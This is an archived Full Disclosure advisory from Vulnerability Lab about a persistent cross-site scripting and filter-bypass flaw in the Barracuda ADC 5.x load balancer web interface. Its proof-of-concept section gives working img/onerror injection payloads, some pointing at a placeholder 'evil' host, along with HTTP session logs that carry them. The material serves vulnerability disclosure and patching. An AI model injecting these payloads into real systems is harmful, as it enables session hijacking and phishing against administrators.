[<prev] [next>] [day] [month] [year] [list]
Message-ID: <bd34a2e6-11eb-0a2f-4c12-0a5243fd5c86@vulnerability-lab.com>
Date: Wed, 11 Jul 2018 15:00:42 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Barracuda ADC 5.x - Filter Bypass & Persistent Validation
Vulnerability
Document Title:
===============
Barracuda ADC 5.x - Filter Bypass & Persistent Validation Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1423
Release Date:
=============
2018-07-09
Vulnerability Laboratory ID (VL-ID):
====================================
1423
Common Vulnerability Scoring System:
====================================
3.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Ensure Application Scalability,Performance, and Security. The Barracuda
Load Balancer ADC is ideal for organizations looking for
a high-performance, yet cost-effective application delivery and security
solution. With the broadest range of hardware and virtual
models, the Barracuda Load Balancer ADC provides maximum flexibility for
organizations looking to build highly secure and scalable
application infrastructure, whether it’s deployed on-premises or in the
cloud.
(Copy of the Vendor Homepage:
https://www.barracuda.com/products/loadbalancer )
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a persistent input
validation web vulnerability in the Barracuda Networks ADC v5.2.0.004
appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2016-10-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: ADC Load Balancer - Appliance Web Application 5.2.0.004
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Bug Bounty Program
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Barracuda networks ADC appliance web-application.
The application-side vulnerability allows remote attackers and
privileged user accounts to inject malicious script codes to compromise
the online service web-application.
The application-side input validation web vulnerability is located in
the servername value of the Services - Konfigurierte Server
[Content Rules Add] module. Local low privileged application user
account can inject malicious script code with persistent attack vector
to the vulnerable to module. The injection point of the issue is the
vulnerable add module and the execution of the malicious code occurs
by the restapi (api) in the Konfigurierte Server (Item Listing) module.
The input form of the appliance web-application are filtered. If an
attacker injects for example script tags with an alert message to see
the cookie the execution is prevented. If the attacker uses an iframes,
embed scripts and img-src tags he will be able to bypass the filter
to execute own codes.
The security risk of the persistent input validation web vulnerability
is estimated as medium with a cvss (common vulnerability scoring system)
count of 3.8. Exploitation of the persistent vulnerability in the
`Services - Konfigurierte Server [Content Rules Add]` module requires a low
privileged heroku account with low user interaction. Successful
exploitation of the vulnerability results in session hijacking, persistent
phishing attacks, persistent redirect to external source and persistent
manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Services - Konfigurierte Server [Content Rules Add]
Vulnerable Parameter(s):
[+] Servername
Affected Module(s):
[+] Konfigurierte Server (Item Listing) - [API] (restapi)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by
remote attackers and local low privileged application user account with
low or medium user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the barracuda adc web-application
2. Open the content rules add modules in the left sidebar
3. Inject own script code payload to the server name value and save the
input (content rules)
Note: A refresh returns back to the listing module
4. The persistent script code execution occurs in listed confirgured
server information next to the edit button (onlclick)
5. Successful reproduce of the stored cross site scripting security
vulnerability!
Vulnerable Module(s): Services > Konfigurierte Server > [Servername]
Request Method(s): POST
PoC: Link
http://adc.localhost:8080/cgi-mod/index.cgi?auth_type=Local&et=1422208913&locale=de_DE&password=031be4109984ca59a98fd56ff6026422&primary_tab=BASIC&secondary_tab=services&user=guest
PoC: Source
<a href="#" data-modal="" data-modal-url="/cgi-mod/index.cgi?
password=9f1133ed1cee2ea778e8198db3d125e0&et=1422208951&auth_type=Local&locale=de_DE&primary_tab=BASIC&scope=rg_web_server&secondary_tab=r
g_server_detail&user=guest"
data-url-param="&scope_data=Corp_Web:192.168.1.4_80&service_name=undefined&server_name=Server_192.168.1.4_80
"><img
src="x"
onerror="alert(/PTEST/)</script">&rule_name=Corp_Web&server_index=0&traffic=0"
data-modal-title="Edit Server" data-modal-submit-type="PUT"
data-modal-submit-uri="rule_group_servers"
data-modal-submit-ids="Content_Routing,undefined,Corp_Web,Server_192.168.1.4_80
"><img src="x" onerror="alert
(/PTEST/)</script">" data-modal-save-label="Änderungen
speichern" data-modal-cancel-label="Abbrechen"
data-modal-onclick="return false;">Bearbeiten</a>
--- PoC Session Logs [POST] ---
Status: 201[Created]
POST
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/content_rules
Mime Type[application/json]
Request Header:
Host[adc.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0)
Gecko/20100101 Firefox/35.0]
Accept[application/json, text/plain, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Authorization[Basic
ZXlKbGRDSTZJakUwTWpJeU1EZzVOVFVpTENKd1lYTnpkMjl5WkNJNkltRTFaalkwWWpnMU0yRmtNelJqTldFMFltTXdZVEpsTVRCagpaVGMwWVRNNUlpd2lkWE5sY2lJNkltZDFaWE4wSW4wPQo6]
Content-Type[application/json;charset=utf-8]
Referer[http://adc.localhost:8080/cgi-mod/index.cgi?auth_type=Local&et=1422208913&locale=de_DE&password=031be4109984ca59a98fd56ff6026422&primary_tab=BASIC&secondary_tab=services&user=guest]
Content-Length[1182]
Cookie[_ga=GA1.2.608616028.1422207688; _gat=1;
_ga=GA1.2.608616028.1422207688; _gat=1]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
{"modalAction":"create_rule","group":"Content_Routing","service_name":"Corp_Web","cache":
{"max_objsize":"256","req_cachehdrs_ignore":"0","negative_responses":"0","expiry_age":"60","file_extensions":"gif,tif,jpg,jpeg,png,bmp,ico,js,jsp,css,jar,swf,pdf"
,"resp_cachehdrs_ignore":"0","enabled":"0","min_objsize":"256"},"extended_match_sequence":"1000","persistence_cookie_domain":"","status":"1","header_name":"","sou
rce_ip_netmask":"","comments":""><img src[http://www.evil.source.com
onerror=alert(/PTEST/)</script>","host_match":""><img
src=http://www.evil.source.com
onerror=alert(/PTEST/)</script>","extended_match":"*"><img src=x
onerror=alert(/PTEST/)</script> undefined (HTTP-Version eq "><img
src=http://www.evolution-
sec.com
onerror=alert(/PTEST/)</script>)","compress":{"min_obj_size":"8192","enabled":"0","content_types":"text/html,text/plain"},"url_match":""><img
src=x
onerror=alert(/PTEST/)</script>","persistence_time":"600","failover_method":"LB","persistence_method":"NONE","lb_algorithm":"weighted_round_robin",
"persistence_cookie_name":"persistence","parameter_name":"","persistence_cookie_security":"0","name":""><img
src=x onerror=alert(/PTEST/)</script>",
"persistence_cookie_path":"","persistence_cookie_httponly":"1","cookie_age":""}]
Response Header:
Server[BarracudaHTTP 4.0]
Content-Type[application/json; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
-
Status: 200[OK]
GET
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/content_rules/%22%3E%3Cimg%20src=http://www.evil.source.com%20onerror=alert(/PTEST/)%3C/script%3E
Mime Type[application/json]
Request Header:
Host[adc.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0)
Gecko/20100101 Firefox/35.0]
Accept[application/json, text/plain, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Authorization[BasicZXlKbGRDSTZJakUwTWpJeU1EZzVOVFVpTENKd1lYTnpkMjl5WkNJNkltRTFaalkwWWpnMU0yRmtNelJqTldFMFltTXdZVEpsTVRCagpaVGMwWVRNNUlpd2lkWE5sY2lJNkltZDFaWE4wSW4wPQo6]
If-Modified-Since[0]
Referer[http://adc.localhost:8080/cgi-mod/index.cgi?auth_type=Local&et=1422208913&locale=de_DE&password=031be4109984ca59a98fd56ff6026422&primary_tab=BASIC&secondary_tab=services&user=guest]
Cookie[_ga=GA1.2.608616028.1422207688; _gat=1;
_ga=GA1.2.608616028.1422207688; _gat=1]
Connection[keep-alive]
Response Header:
Server[BarracudaHTTP 4.0]
Content-Type[application/json; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
Reference(s):
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/content_rules/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a parse and encode of the vulnerable
content rules input field values.
Restrict the input and disallow special chars. Filter and parse the item
listing in the configured server module to prevent an execution.
Implement a own exception-handling to prevent application-side script
code executions.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability
in the barracuda networks adc appliance
web-application is estimated as medium (CVSS 3.8).
Note: The issue was reported in 2016 to the barracuda networks developer
team. The issue was finally resolved in 2017 Q1 - Q4.
The disclosure process took about 1 year to complete by recognizing the
patch cycle.
Credits & Authors:
==================
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -
www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists